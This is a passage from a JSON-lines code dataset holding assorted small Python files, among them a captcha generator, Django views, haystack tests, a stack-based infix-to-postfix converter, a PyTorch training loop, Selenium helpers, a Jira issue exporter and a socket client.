str(round(sum(book['DailyGainLoss']),2)))\nprint(\"Total Return From {} to {} = \".format(sdate, edate) + str(round(sum(book['DailyGainLoss'])/FUNDS*100,2))+\"%\")\n","sub_path":"Optimizer_Backtest.py","file_name":"Optimizer_Backtest.py","file_ext":"py","file_size_in_byte":13155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407838417","text":"\n# '第 0010 题:使用 Python 生成类似于图中的字母验证码图片'\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter\n\nimport random,string\n\ndef rndChar():\n stringletters = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n return random.choice(stringletters)\ndef rndColor1():\n return (random.randint(64, 255), random.randint(64, 255), random.randint(64, 255))\ndef rndColor2():\n return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))\n\nfontpath = '/home/x8/Desktop/python/show-me-the-code/0010/Futura.ttf'\n\nwidth = 60*4\nheight = 60\n\nimage = Image.new('RGB', (width, height), (255, 255, 255))\n\nfont = ImageFont.truetype(font=fontpath,size = int(height * 0.7))\n# 创建Draw对象:\ndraw = ImageDraw.Draw(image)\n# 填充每个像素:\nfor x in range(width):\n for y in range(height):\n draw.point((x, y), fill=rndColor1())\n\nfor t in range(4):\n draw.text((60 * t + 10, 0), rndChar(), font=font, fill=rndColor2())\n \nimage = image.filter(ImageFilter.BLUR)\nimage.save('code.jpg', 'jpeg')\n# image.show()\n\n\n","sub_path":"0010/MAKEyz.py","file_name":"MAKEyz.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"16136365","text":"from random import randrange\n \n\ndef rzuckostka():\n sum=0\n i=0\n \n while i<3:\n x=randrange(1,7)\n print(x, end=' ')\n sum+=x\n i+=1\n print(f'Suma oczek: {sum}')\nrzuckostka()\n \n ","sub_path":"04-Subroutines/zad17.py","file_name":"zad17.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2231350","text":"from django.shortcuts import render\n\nfrom authapp.models import Companies\nfrom researchapp.models import Document\n\n\ndef research(request):\n companies = Document.objects.order_by('company').distinct('company__name_company').values('company__name_company',\n 'file__file', 'pk',\n 'name', 'type_id',\n 'description')\n # documents = Document.objects.filter(author__in=[1,]).exclude(type__id=2)\n documents = Document.objects.all().values('company__name_company', 'file__file', 'pk', 'name', 'type_id',\n 'description')\n\n content = {\n 'companies': companies,\n 'documents': documents\n }\n\n return render(request, 'researchapp/research.html', content)\n","sub_path":"bridges/researchapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"61307581","text":"import pytest\n\nfrom haystack import Document\nfrom haystack.document_classifier.base import BaseDocumentClassifier\n\n\n@pytest.mark.slow\ndef test_document_classifier(document_classifier):\n assert isinstance(document_classifier, BaseDocumentClassifier)\n\n docs = [\n Document(\n content=\"\"\"That's good. I like it.\"\"\"*700, # extra long text to check truncation\n meta={\"name\": \"0\"},\n id=\"1\",\n ),\n Document(\n content=\"\"\"That's bad. I don't like it.\"\"\",\n meta={\"name\": \"1\"},\n id=\"2\",\n ),\n ]\n results = document_classifier.predict(documents=docs)\n expected_labels = [\"joy\", \"sadness\"]\n for i, doc in enumerate(results):\n assert doc.to_dict()[\"meta\"][\"classification\"][\"label\"] == expected_labels[i]\n\n\n@pytest.mark.slow\ndef test_zero_shot_document_classifier(zero_shot_document_classifier):\n assert isinstance(zero_shot_document_classifier, BaseDocumentClassifier)\n\n docs = [\n Document(\n content=\"\"\"That's good. I like it.\"\"\"*700, # extra long text to check truncation\n meta={\"name\": \"0\"},\n id=\"1\",\n ),\n Document(\n content=\"\"\"That's bad. I don't like it.\"\"\",\n meta={\"name\": \"1\"},\n id=\"2\",\n ),\n ]\n results = zero_shot_document_classifier.predict(documents=docs)\n expected_labels = [\"positive\", \"negative\"]\n for i, doc in enumerate(results):\n assert doc.to_dict()[\"meta\"][\"classification\"][\"label\"] == expected_labels[i]\n","sub_path":"test/test_document_classifier.py","file_name":"test_document_classifier.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"520441277","text":"class Node(object):\n\t\"\"\"docstring for ClassName\"\"\"\n\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.next = None\n\t\tself.prev = None\n\n\nclass Stack:\n\tdef __init__(self):\n\t\tself.head = None\n\n\tdef push(self, data):\n\t\tnew_node = Node(data)\n\t\tif self.head is None:\n\t\t\tself.head = new_node\n\t\telse:\n\n\t\t\tself.head.prev = new_node \n\t\t\tnew_node.next = self.head \n\t\t\tnew_node.prev = None\n\t\t\tself.head = new_node \n\tdef display(self):\n\t\tif self.head is None:\n\t\t\tprint(\"Stack is empty\")\n\t\telse:\n\t\t\ttemp=self.head\n\t\t\twhile temp:\n\t\t\t\tprint(temp.data)\n\t\t\t\ttemp=temp.next\n\tdef pop(self):\n\t\ttemp=self.head\n\t\tif temp is None:\n\t\t\tprint(\"stack is Underflow\")\n\t\telse:\n\t\t\t#check stack has only one item then remove first element\n\t\t\tif temp.next is None:\n\t\t\t\tself.head=None\n\t\t\t\tself.display()\n\t\t\telse:\n\t\t\t\tself.head=self.head.next\n\t\t\t\tself.head.prev=None\n\t\t\t\tself.display()\n\n\tdef stack_length(self):\n\t\ttemp=self.head\n\t\tcount=0\n\t\tif temp is None:\n\t\t\treturn 0\n\t\telse:\n\t\t\twhile temp:\n\t\t\t\tcount+=1\n\t\t\t\ttemp=temp.next\n\t\t\treturn count\n\n\n# A utility function to check is the given character \n# is operand \ndef is_operand(ch): \n return ch.isalnum() \n\ndef prcedency(op):\n\toperator={'+':1,'-':1,'*':2,'/':2,'^':3}\n\treturn (operator[op] if op in operator else 0 )\n\ndef opening_paranthisis(ch):\n p=\"(\" \n return (1 if ch in p else 0)\n \ndef closing_paranthisis(ch):\n p=\")\" \n return (1 if ch in p else 0)\n\ndef is_operator(op):\n\toperator=['+','-','*','/','^']\n\treturn (1 if op in operator else 0 )\n\ndef has_prcedency(x,y):\n\treturn (prcedency(x)>prcedency(y))\n\n\n\ndef infix_to_postfix(exp):\n\tstack1=Stack()\n\t#print(stack1.display())\n\tresult=\"\"\n\tfor i in range(0,len(exp)):\n\t\t#is_operand check char is no or any charactor\n\t\tif is_operand(exp[i]):\n\t\t\tresult=result+exp[i]\n\n\t\telif is_operator(exp[i]):\n\t\t\t#is_operator check operator\n\t\t\twhile(stack1.stack_length()>0 and not opening_paranthisis(exp[i]) and has_prcedency(stack1.head.data,exp[i])):\n\t\t\t\tresult=result+stack1.head.data\n\t\t\t\tstack1.pop()\n\t\t\t\t#print(\"inside running\")\n\t\t\tstack1.push(exp[i])\n\t\t\tprint(stack1.display())\n\n\t\telif opening_paranthisis(exp[i]):\n\t\t\tstack1.push(exp[i])\n\n\t\telif closing_paranthisis(exp[i]):\n\t\t\twhile stack1.stack_length()>0 and not opening_paranthisis(stack1.head.data):\n\t\t\t\tresult=result+stack1.head.data\n\t\t\t\tstack1.pop\n\t\t\tstack1.pop()\n\twhile (stack1.head):\n\t\tresult=result+stack1.head\n\t\tstack1.pop()\n\n\tprint(result)\n\n\n\t\n\n\n\nif __name__ == '__main__':\n\n\tstack=Stack()\n\twhile (True):\n\t\tprint(\"################### Welcome in stack Menu #####################\")\n\t\tprint(\"1 push data \")\n\t\tprint(\"2 show data \")\n\t\tprint(\"3 pop element\")\n\t\tprint(\"4 infix to postfix conversion \")\n\n\t\tch=int(input(\"Enter your choice >\"))\n\t\tif ch==1:\n\t\t\twhile(True):\n\t\t\t\tdata=input(\"Enter data >\")\n\t\t\t\tif not data:\n\t\t\t\t\tbreak\n\t\t\t\tstack.push(data)\n\t\telif ch==2:\n\t\t\tstack.display()\n\t\telif ch==3:\n\t\t\tstack.pop()\n\t\telif ch==4:\n\t\t\texpression=input(\"Enter expression >\")\n\t\t\tinfix_to_postfix(expression)\n\t\telse:\n\t\t\tpass\n","sub_path":"Stack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"40791049","text":"\"\"\"\n\tsetup.py\n\n\tcreates the necessary database file\n\tand initialises it with random\n\tvalues\n\"\"\"\n\nimport sqlite3 as sql\nimport random\n\nadjectives = open(\"adjectives.txt\", \"r\")\nnouns = open(\"nouns.txt\", \"r\")\n\nnoun = random.choice([i.rstrip().rstrip(\"\\n\").lstrip().lstrip(\"\\n\") for i in nouns])\nadjective = random.choice([i.rstrip().rstrip(\"\\n\").lstrip().lstrip(\"\\n\") for i in adjectives])\ngithub = \"https://github.com/shardic1/li.nk\"\nt = (noun+adjective, github,)\n\nconn = sql.connect(\"links.db\")\nc = conn.cursor()\nc.execute(\"\"\"CREATE TABLE IF NOT EXISTS links\n\t\t\t(key TEXT, url TEXT)\"\"\")\nc.execute(\"\"\"INSERT INTO links (key, url)\n\t\t\tVALUES (?, ?)\"\"\", t)\nconn.commit()\nconn.close()","sub_path":"li.nk/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"192126750","text":"import torch\nimport torch.nn.functional as fun\nfrom torch.autograd import Variable\nimport sys\nimport numpy as np\nimport pdb, os, argparse\nfrom datetime import datetime\nimport copy\n\nfrom model.CPD_ResNet_models import CPD_ResNet\nfrom model.CPD_models import CPD_VGG\nfrom model.CPD_MobileNet_models import CPD_MobileNet\nfrom data import get_loader\nfrom utils import clip_gradient, adjust_lr\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '1'\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epoch', type=int, default=5000, help='epoch number')\nparser.add_argument('--lr', type=float, default=1e-4, help='learning rate')\nparser.add_argument('--batchsize', type=int, default=16, help='training batch size')\nparser.add_argument('--trainsize', type=int, default=448, help='training dataset size')\nparser.add_argument('--clip', type=float, default=0.5, help='gradient clipping margin')\nparser.add_argument('--is_ResNet', type=str, default='mobile', help='VGG or ResNet backbone')\nparser.add_argument('--decay_rate', type=float, default=0.1, help='decay rate of learning rate')\nparser.add_argument('--decay_epoch', type=int, default=50, help='every n epochs decay learning rate')\nopt = parser.parse_args()\n\nback_dir = '/home/hypevr/Desktop/data/projects/background/image/'\nprint('Learning Rate: {} ResNet: {}'.format(opt.lr, opt.is_ResNet))\n# build models\nif opt.is_ResNet == 'resnet':\n model = CPD_ResNet()\nelif opt.is_ResNet == 'vgg':\n model = CPD_VGG()\nelif opt.is_ResNet == 'mobile':\n model = CPD_MobileNet()\n\ndef DICE(inputs, targets, smooth=1):\n # comment out if your model contains a sigmoid or equivalent activation layer\n inputs = fun.sigmoid(inputs)\n # flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n\n intersection = (inputs * targets).sum()\n dice = (2. * intersection + smooth) / (inputs.sum() + targets.sum() + smooth)\n\n return 1 - dice\n\nmodel_dir = \"./models/CPD_MobileNet_v3/\"\n\n\n##############################\ncheckpoint = None\nload_pretrained = False\n#############################\n\n\nif checkpoint:\n checkpoint_dir = model_dir + 'CPD_' + str(checkpoint) + '.pth'\n model.load_state_dict(torch.load(checkpoint_dir))\n\nif load_pretrained:\n model.load_state_dict(torch.load('CPD.pth'))\n\nmodel.cuda()\nparams = model.parameters()\noptimizer = torch.optim.Adam(params, opt.lr)\n\ndata_root = '/home/hypevr/data/projects/data/combined_human/'\nimage_root = data_root+'train/image/'\ngt_root = data_root+'train/mask/'\ntrain_loader = get_loader(image_root, gt_root, batchsize=opt.batchsize, trainsize=opt.trainsize, fake_back_rate=0.1, back_dir=back_dir)\ntotal_step = len(train_loader)\n\nimage_root_v = data_root+'val/image/'\ngt_root_v = data_root+'val/mask/'\nval_loader = get_loader(image_root_v, gt_root_v, batchsize=opt.batchsize, trainsize=opt.trainsize, fake_back_rate=0, back_dir=None)\ntotal_step_v = len(val_loader)\n\n\nCE = torch.nn.BCEWithLogitsLoss()\n\n\n\ndef train(train_loader, model, optimizer, epoch):\n model.train()\n for i, pack in enumerate(train_loader, start=1):\n optimizer.zero_grad()\n images, gts = pack\n images = Variable(images)\n gts = Variable(gts)\n images = images.cuda()\n gts = gts.cuda()\n\n atts, dets = model(images) #\n loss1 = CE(atts, gts)\n loss2 = CE(dets, gts)\n loss = loss1 + loss2\n loss.backward()\n\n clip_gradient(optimizer, opt.clip)\n optimizer.step()\n\n print(str(i) + '/' + str(total_step))\n sys.stdout.write(\"\\033[F\")\n\n if i == total_step:\n print('{} Epoch [{:03d}/{:03d}], Step [{:04d}/{:04d}], Loss1: {:.4f} Dice1: {:0.4f}'.\n format(datetime.now(), epoch, opt.epoch, i, total_step, loss1.data, loss.data, ))\n\n\n save_path = 'models/' + opt.is_ResNet + '_random_0.1/'\n\n\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n torch.save(model.state_dict(), save_path + 'CPD_%d.pth' % epoch)\n if (epoch+1) % 3 == 0:\n model.eval()\n for i, pack in enumerate(val_loader, start=1):\n images, gts = pack\n images = Variable(images)\n gts = Variable(gts)\n images = images.cuda()\n gts = gts.cuda()\n\n atts, dets = model(images) #\n\n #dice1 = DICE(atts, gts)\n loss1 = CE(atts, gts)# + dice1\n # dice2 = DICE(dets, gts)\n loss2 = CE(dets, gts)# + dice2\n loss = loss1 + loss2\n\n print(str(i) + '/' + str(total_step_v))\n sys.stdout.write(\"\\033[F\")\n\n if i == total_step_v:\n print(\n 'validation phase: {} Epoch [{:03d}/{:03d}], Step [{:04d}/{:04d}], Loss1: {:.4f} Loss2: {:0.4f}'.\n format(datetime.now(), epoch, opt.epoch, i, total_step, loss1.data, loss.data))\n\n torch.save(model.state_dict(), save_path + 'CPD_%d.pth' % epoch)\n\nprint(\"Let's go!\")\nfor epoch in range(1, opt.epoch):\n if checkpoint:\n epoch += int(checkpoint)\n adjust_lr(optimizer, opt.lr, epoch, opt.decay_rate, opt.decay_epoch)\n train(train_loader, model, optimizer, epoch)\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"24277034","text":"# rediriger stdout dans un buffer :\nsys.stdout = StringIO.StringIO()\n \n# appel de la fonction qui remplira stdout (donc le buffer)\nniveau_1()\n\n# récupérer le contenu du buffer :\ns = sys.stdout.getvalue()\n\n# On test\ntry :\n\tassert s == 'Hello World !\\n'\n\tsuccess=True\nexcept:\n\tsuccess=False \n\n \n# fermer le buffer :\nsys.stdout.close()\n \n# rediriger stdout vers la sortie standart :\nsys.stdout = sys.__stdout__\n","sub_path":"level/niveau_1/test_niveau_1.py","file_name":"test_niveau_1.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268422846","text":"import pytest\n\nfrom unittest.mock import sentinel\n\nfrom ..flows import PreflightFlow\n\n\nclass TestPreflightFlow:\n def test_init(self, mocker):\n init = mocker.patch('cumulusci.core.flows.BaseFlow.__init__')\n init.return_value = None\n preflight_flow = PreflightFlow(preflight_result=sentinel.preflight)\n assert preflight_flow.preflight_result == sentinel.preflight\n\n @pytest.mark.django_db\n def test_post_flow(\n self, mocker, user_factory, plan_factory, step_factory,\n preflight_result_factory):\n init = mocker.patch('cumulusci.core.flows.BaseFlow.__init__')\n init.return_value = None\n user = user_factory()\n plan = plan_factory()\n step1 = step_factory(plan=plan, task_name='name_1')\n step_factory(plan=plan, task_name='name_2')\n step3 = step_factory(plan=plan, task_name='name_3')\n pfr = preflight_result_factory(user=user, plan=plan)\n preflight_flow = PreflightFlow(preflight_result=pfr)\n preflight_flow.step_return_values = [\n {'msg': 'error 1', 'status_code': 'error', 'task_name': 'name_1'},\n {'msg': '', 'status_code': 'ok', 'task_name': 'name_2'},\n {'msg': 'error 2', 'status_code': 'error', 'task_name': 'name_3'},\n ]\n\n preflight_flow._post_flow()\n\n assert pfr.results == {\n step1.id: [{'status': 'error', 'message': 'error 1'}],\n step3.id: [{'status': 'error', 'message': 'error 2'}],\n }\n","sub_path":"metadeploy/api/tests/flows.py","file_name":"flows.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"800189","text":"import logging\nfrom collections import namedtuple, defaultdict\nfrom typing import Dict, List, Tuple\n\nimport jira\nfrom dateutil import parser\nfrom yarl import URL\n\nfrom plan_b.issue import parse_work_estimate_text, Issue, Team, WorkEstimate\nfrom plan_b.plan import IssuesDataSource\nfrom plan_b.team import match_team_by_worker_name\n\nlog = logging.getLogger(__name__)\n\n\nJiraIssue = namedtuple(\n 'JiraIssue',\n [\n 'key',\n 'url',\n 'type',\n 'summary',\n 'assignee',\n 'reporter',\n 'created',\n 'resolved',\n 'due',\n 'time_spent',\n 'severity',\n 'priority',\n 'components',\n 'tags',\n 'qa_advice',\n 'status',\n 'resolution',\n 'epic_link',\n 'comments',\n 'aggregated_orig_estimate',\n 'orig_estimate',\n 'raw_issue'\n ]\n)\n\n\nJiraComment = namedtuple('JiraComment', ['author', 'body'])\n\n\nWORKDAY_SECONDS = 28800 # 8 * 60 * 60\n\n\ndef make_jira_issue_from_raw_data(raw_issue, comments=tuple()) -> JiraIssue:\n jira_server = getattr(raw_issue, '_options', {'server': 'https://jira.domain'})['server']\n\n return JiraIssue(\n key=raw_issue.key,\n url=f'{jira_server}/browse/{raw_issue.key}',\n type=raw_issue.fields.issuetype.name,\n summary=raw_issue.fields.summary,\n assignee=raw_issue.fields.assignee,\n reporter=raw_issue.fields.reporter,\n created=parser.parse(raw_issue.fields.created) if raw_issue.fields.created else None,\n resolved=parser.parse(raw_issue.fields.resolutiondate) if raw_issue.fields.resolutiondate else None,\n due=parser.parse(raw_issue.fields.duedate) if raw_issue.fields.duedate else None,\n time_spent=raw_issue.fields.aggregatetimespent,\n severity=raw_issue.fields.customfield_10073.value\n if hasattr(raw_issue.fields, 'customfield_10073') and raw_issue.fields.customfield_10073 is not None\n else None,\n priority=raw_issue.fields.priority,\n components=str(raw_issue.fields.components),\n tags=str(raw_issue.fields.customfield_10180),\n qa_advice=raw_issue.fields.customfield_16390\n if hasattr(raw_issue.fields, 'customfield_16390') and raw_issue.fields.customfield_16390 is not None\n else None,\n status=raw_issue.fields.status.name,\n resolution=raw_issue.fields.resolution,\n epic_link=raw_issue.fields.customfield_13694 if raw_issue.fields.customfield_13694 else None,\n comments=comments,\n aggregated_orig_estimate=raw_issue.fields.aggregatetimeoriginalestimate,\n orig_estimate=raw_issue.fields.timeoriginalestimate,\n raw_issue=raw_issue\n )\n\n\nclass JiraIssuesDataSource(IssuesDataSource):\n\n def __init__(self, name: str, url: URL):\n super().__init__(name, url)\n self.jira_client = None\n\n @staticmethod\n def _find_and_parse_plan_comment(jira_issue: JiraIssue, team_by_name: dict) -> defaultdict:\n estimates_by_team = defaultdict(WorkEstimate)\n for comment in jira_issue.comments:\n estimate, team_name = parse_work_estimate_text(comment.body, comment.author, team_by_name)\n if estimate is None:\n continue\n if team_name is None:\n log.warning('Could not match team for %s', jira_issue.url)\n estimates_by_team[team_name] = estimate\n\n return estimates_by_team\n\n def export_issues(self, data_query: str, teams: List[Team]) -> Tuple[List[Issue], Dict[Team, int]]:\n if not self.jira_client:\n self.jira_client = jira.JIRA(\n {\n 'server': str(URL.build(scheme=self.url.scheme, host=self.url.host))\n },\n basic_auth=(self.url.user, self.url.password)\n )\n\n epics_and_stories = []\n known_bugs = []\n epics = set()\n\n log.debug('Searching issues for project with query \"%s\"', data_query)\n raw_issues = self.jira_client.search_issues(data_query, maxResults=10000)\n for raw_issue in raw_issues:\n jira_issue = make_jira_issue_from_raw_data(raw_issue)\n if jira_issue.type == 'Epic':\n epics.add(jira_issue.key)\n if jira_issue.type in ('Epic', 'Story'):\n epics_and_stories.append(jira_issue)\n if jira_issue.type in ('Bug', 'Bug US') and jira_issue.status.lower() in ['open', 'in progress']:\n known_bugs.append(jira_issue)\n\n filtered_epics_and_stories = []\n for issue in epics_and_stories:\n if issue.type == 'Story' and issue.epic_link in epics:\n continue # skip stories that are already in epics assigned to teams from plan\n log.debug('loading comments for issue %s', issue.key)\n comments = self.jira_client.comments(issue.raw_issue)\n issue = issue._replace(comments=tuple(JiraComment(x.author.name, x.body) for x in comments))\n filtered_epics_and_stories.append(issue)\n\n epics_and_stories = []\n teams_by_name = {x.name: x for x in teams}\n for issue in filtered_epics_and_stories:\n log.debug('Scanning for #plan comment in issue %s', issue.key)\n estimates = self._find_and_parse_plan_comment(issue, teams_by_name)\n\n owner_team = match_team_by_worker_name(issue.assignee.name, teams)\n if owner_team is None:\n log.warning('Owner team is not a team from plan for %s', issue.url)\n epics_and_stories.append(\n Issue(\n issue.key,\n issue.summary,\n issue.url,\n issue.status,\n work_estimates=estimates,\n owned_by_team=owner_team\n )\n )\n\n known_bugs_count = {x: 0 for x in teams if x.is_dev()}\n for bug in known_bugs:\n if not bug.assignee:\n log.warning(f'Empty or invalid assignee for bug %s', bug.url)\n continue\n\n bug_owner_team = match_team_by_worker_name(bug.assignee.name, teams)\n if bug_owner_team:\n if bug_owner_team.is_dev():\n known_bugs_count[bug_owner_team] += 1\n else:\n log.warning('Invalid owner team for bug %s', bug.url)\n\n return epics_and_stories, known_bugs_count\n","sub_path":"plan_b/issue_data_sources/jira.py","file_name":"jira.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434135770","text":"def giaithua(n):\n thua=1\n if n==0 or n==1:\n return thua\n else:\n for i in range(2,n+1):\n thua*=i\n return thua\nn=int(input(\"Nhap:\"))\nprint(giaithua(n))\n\n","sub_path":"Buoi3/lesson3.2.py","file_name":"lesson3.2.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"24129369","text":"import socket\n#创建socket对象\nsk = socket.socket()\n#连接指定计算机的端口\nsk.connect(('127.0.0.1',12300))\n#发送消息\nsk.sendall(input('>>>').encode('utf8'))\n#接收消息\nserver_info = sk.recv(1024).decode('utf8')\nprint (f'info from server:{server_info}')\nsk.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python_Advanced/socket编程/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"56557071","text":"# 异常有多种\n# i = j (not defined 未定义错误);\n\n# 编写程序的语法错误 (syntaxError);\n\n# a ='123'\n# print(a[3])\n# 这里会出现数组越界(indexError);\n\n# b = {'a':1, 'b':2}\n# print(b['c'])\n# 这里出现键错误(keyError);\n\n# 当用户输入非数字时进行提示\ntry:\n year = int(input('input year:'))\nexcept ValueError as e:\n print('年份请输入数字 %s' % e)\n\n# 文件操作\ntry:\n file_write = open('name.txt', 'w')\nexcept Exception as e:\n print(e)\nfinally:\n file_write.close()\n","sub_path":"basics/error_handler.py","file_name":"error_handler.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"401113772","text":"from selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom Selenium2Library import utils\r\nfrom Selenium2Library.locators import ElementFinder\r\nfrom robot.libraries.BuiltIn import BuiltIn\r\nfrom Selenium2Library.keywords.keywordgroup import KeywordGroup\r\nimport time\r\nfrom datetime import datetime\r\n\r\nclass Custom(KeywordGroup):\r\n\r\n\tdef sort_num_session_order(self, visiblerow):\r\n\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\tbuiltInObj = BuiltIn()\r\n\t\tself.mouse_over(\"id=ajs_T_AccountsTable_tAccounts_F_AccountsTable_tAccounts_bar_knob_handle\");\r\n\t\t#time.sleep(5)\r\n\t\tlist1 = []\r\n\t\tlist2 = []\r\n\t\tfor num in range(0,int(visiblerow)):\r\n\t\t\tpath = \"xpath=.//*[@id='ajs_T_AccountsTable_tAccounts_F_AccountsTable_tAccounts_cell_R\" + str(num) + \"C2']/div/span\";\r\n\t\t\tvalue = self.get_text(path);\r\n\t\t\tlist1.append(value)\r\n\t\t\tbuiltInObj.log_to_console(value)\t\t\r\n\t\tbuiltInObj.log_to_console(list1)\r\n\t\tlist2.extend(list1)\r\n\t\t#list2.sort() #THIS WILL NOT BE EQUAL\r\n\t\tlist2.sort(key=int) # THIS WILL BE EQUAL\r\n\t\tbuiltInObj.log_to_console(list2)\r\n\t\tif list1 == list2:\r\n\t\t\tbuiltInObj.log_to_console(\"EQUAL\")\r\n\t\telse:\r\n\t\t\tbuiltInObj.log_to_console(\"NOT EQUAL\")\r\n\t\t\t\r\n\t\t\t\r\n\tdef last_session_order(self, visiblerow):\r\n\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\tbuiltInObj = BuiltIn()\r\n\t\tself.mouse_over(\"id=ajs_T_AccountsTable_tAccounts_F_AccountsTable_tAccounts_bar_knob_handle\");\r\n\t\t#time.sleep(5)\r\n\t\tlist1 = []\r\n\t\tlist2 = []\r\n\t\tfor num in range(0,int(visiblerow)):\r\n\t\t\tpath = \"xpath=.//*[@id='ajs_T_AccountsTable_tAccounts_F_AccountsTable_tAccounts_cell_R\" + str(num) + \"C5']/div/span\"\r\n\t\t\tvalue = self.get_text(path);\r\n\t\t\t#time.strftime('%M %D %Y %H:%M:%S', time.strptime(value, '%M %D %Y %H:%m:%S %p'))\r\n\t\t\tdate_obj = datetime.strptime(value, \"%m/%d/%Y %I:%M %p\")\r\n\t\t\tbuiltInObj.log_to_console(date_obj)\t\t\t\r\n\t\t\tlist1.append(date_obj)\t\t\t\r\n\t\tlist2.extend(list1)\r\n\t\tlist2.sort()\r\n\t\tbuiltInObj.log_to_console(list1)\r\n\t\tbuiltInObj.log_to_console(\"******************************\")\r\n\t\tbuiltInObj.log_to_console(list2)\r\n\t\tif list1 == list2:\r\n\t\t\tbuiltInObj.log_to_console(\"EQUAL\")\r\n\t\telse:\r\n\t\t\tbuiltInObj.log_to_console(\"NOT EQUAL\")\t\r\n\t\t\r\n\tdef mouse_scroll(self, locator):\r\n\t\t\t\"\"\"Simulates releasing the left mouse button on the element specified by `locator`.\r\n\r\n\t\t\tKey attributes for arbitrary elements are `id` and `name`. See\r\n\t\t\t`introduction` for details about locating elements.\r\n\t\t\t\"\"\"\r\n\t\t\tself = BuiltIn().get_library_instance('Selenium2Library')\t\t\t\r\n\t\t\t# self._info(\"**********************Simulating Mouse Up on element '%s'\" % locator)\r\n\t\t\t# self._warn(\"*********** '%s' *************\" % locator)\r\n\t\t\telement = self._element_find(locator, True, False)\r\n\t\t\tif element is None:\r\n\t\t\t\traise AssertionError(\"ERROR: Element %s not found.\" % (locator))\r\n\t\t\tsize = element.size\r\n\t\t\toffsetx = (size['width'] / 2) + 2\r\n\t\t\toffsety = (size['height'] / 2) + 2\r\n\t\t\t# the following is one long line indented the same as the above lines\r\n\t\t\tActionChains(self._current_browser()).move_to_element(element).click_and_hold(element).move_by_offset(offsetx,offsety).release(element).perform()\r\n\t\t # the above is one long line indented the same as the other lines\t\t\r\n\t\t \r\n\t\t \r\n\tdef get_tool_tip(self, locator):\r\n\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\tself._warn(\"LOCATOR: '%s' \" %locator)\r\n\t\t\r\n\tdef string_has_substring(self, mainstr, substr):\r\n\t\tself = BuiltIn().get_library_instance('Selenium2Library')\r\n\t\tif mainstr.find(substr) > -1:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn \r\n\t\t\t\r\n\tdef date_key(a):\r\n\t\t\"\"\"\r\n\t\ta: date as string\r\n\t\t\"\"\"\r\n\t\ta = datetime.datetime.strptime(a, '%d.%m.%Y').date()\r\n\t\treturn a\t\t\t","sub_path":"Library/Custom_09_14_2014.py","file_name":"Custom_09_14_2014.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"211274401","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.post_list, name='post_list'),\n path('post//', views.post_detail, name='post_detail'),\n path('contact', views.contact, name='contact'),\n path('cart', views.cart, name='cart'),\n path('cart//',views.update_cart, name='update_cart'),\n]\n","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169144732","text":"from tkinter import*\r\nroot=Tk()\r\nroot.geometry('500x500')\r\nfr=Frame()\r\nfr.pack(pady=5)\r\ncanv=Canvas(root,width=500,height=500)\r\ncanv.pack()\r\ncanv.create_oval(30,30,200,200,fill='green')\r\n\r\nmainloop()\r\n","sub_path":"python1.py","file_name":"python1.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621795434","text":"# -*- coding: utf-8 -*-\nimport os\n# import sys\nimport time\nimport logging\nimport configparser\nfrom mapping import mapping\nfrom selenium import common\nfrom selenium import webdriver\n# from 